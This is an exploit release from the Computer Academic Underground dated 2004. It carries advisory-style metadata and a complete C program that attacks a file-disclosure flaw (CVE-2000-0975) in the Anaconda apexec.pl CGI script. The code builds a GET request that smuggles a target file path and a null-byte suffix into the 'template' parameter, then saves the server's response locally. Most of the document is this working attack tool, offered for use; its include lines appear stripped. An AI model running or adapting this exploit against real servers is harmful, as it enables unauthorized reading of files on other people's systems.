____ ____ __ __ / \ / \ | | | | ----====####/ /\__\##/ /\ \##| |##| |####====---- | | | |__| | | | | | | | ___ | __ | | | | | ------======######\ \/ /#| |##| |#| |##| |######======------ \____/ |__| |__| \______/ Computer Academic Underground http://www.caughq.org Exploit Code ===============/======================================================== Exploit ID: CAU-EX-2004-0003 Release Date: 2004.10.19 Title: anaconda-cp.c Description: Anaconda apexec.pl File Disclosure Exploit Wrapper Tested: [ANACONDA! EXECUTIVE]: [3.2h] [1/31/01] [FOUNDATION DIRECTORY]: [1.10] [03/06/02] Attributes: File Disclosure Exploit URL: http://www.caughq.org/exploits/CAU-EX-2004-0003.txt Author/Email: I)ruid ===============/======================================================== Description =========== This tool connects to the target server on the specified http port, requests a file using Anaconda's apexec.pl template function, then copies the contents of the response into a specified local copy of the requested file. Credits ======= Pestilence is credited with discovering this vulnerability on October 13, 2000. References ========== http://synnergy.net/downloads/advisories/SLA-2000-17.anaconda.txt http://www.securityfocus.com/bid/2338 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0975 Product Homepage: http://www.anaconda.net Exploit ======= /* * Anaconda apexec.pl - File Disclosure Exploit Wrapper * 2004.10.19 - I)ruid * * This tool connects to the target server on the specified http * port, requests a file using Anaconda's apexec.pl template * function, then copies the contents of the response into a * specified local copy of the requested file. * */ #include #include #include #include #include #include #include #include #include #include #include #include #define DEBUG 0 extern int errno; static char get_part_1[] = "/cgi-bin/apexec.pl?template="; static char get_part_2[] = "%%0000.html"; int main( int argc, char *argv[] ) { FILE *f1; int x, sock, bytes; int commandlen; char *remotehost; char *remoteport; char *remotefile; char *localfile; char http_command[1024]; struct in_addr address; struct sockaddr_in addr; struct hostent *h; char buffer[1]; if( argc < 5 ) { fprintf( stderr, "Usage: %s \ \n", basename(argv[0]) ); exit(-1); } remotehost = argv[1]; remoteport = argv[2]; remotefile = argv[3]; localfile = argv[4]; /* Output Header */ printf( "apexec.pl File Disclosure Exploit\n" ); printf( "I)ruid \n\n" ); printf( "Attempting retrieval of %s from %s:%s\n", \ remotefile, remotehost, remoteport ); /* Convert remotehost into binary network byte order */ if( inet_aton( remotehost, &address ) == 0 ) { if( ! (h = gethostbyname( remotehost )) ) { perror(remotehost); exit(-1); } memcpy( &address.s_addr, h->h_addr_list[0], \ sizeof(unsigned long) ); } /* Build socket */ if ( (sock = socket( PF_INET, SOCK_STREAM, IPPROTO_TCP )) == -1 ) { fprintf( stderr, "socket: %s\n", strerror(errno) ); } /* Connect our socket to remote host */ addr.sin_family = PF_INET; addr.sin_addr.s_addr = address.s_addr; addr.sin_port = htons(atol(remoteport)); if( (connect( sock, (struct sockaddr *) &addr, sizeof(addr) )) \ == -1 ) { fprintf( stderr, "connect: %s\n", strerror(errno) ); exit(-1); } /* Send file request */ commandlen = strlen("GET ") + strlen(get_part_1) + \ strlen(remotefile) + strlen(get_part_2) + 1; sprintf( http_command, "GET %s%s%s\n", get_part_1, remotefile, \ get_part_2 ); if(DEBUG) printf( "Sending GET request: %s", http_command ); if( (write( sock, &http_command, commandlen )) == -1 ) { fprintf( stderr, "write: %s\n", strerror(errno) ); exit(-1); } if(DEBUG>2) for( x = 0; x < commandlen; x++ ) printf( "\\x%02x", \ http_command[x] ); if(DEBUG>2) printf( "\n" ); /* Read in response and write it to file */ f1 = fopen( localfile, "w" ); while( (bytes = read( sock, buffer, sizeof(buffer) )) > 0 ) { if(DEBUG>2) printf( "%c", buffer[0] ); fwrite( buffer, sizeof(buffer), 1, f1 ); } if( bytes == -1 ) { fprintf( stderr, "read: %s\n", strerror(errno) ); exit(-1); } /* cleanup */ fclose( f1 ); close( sock ); exit( 0 ); }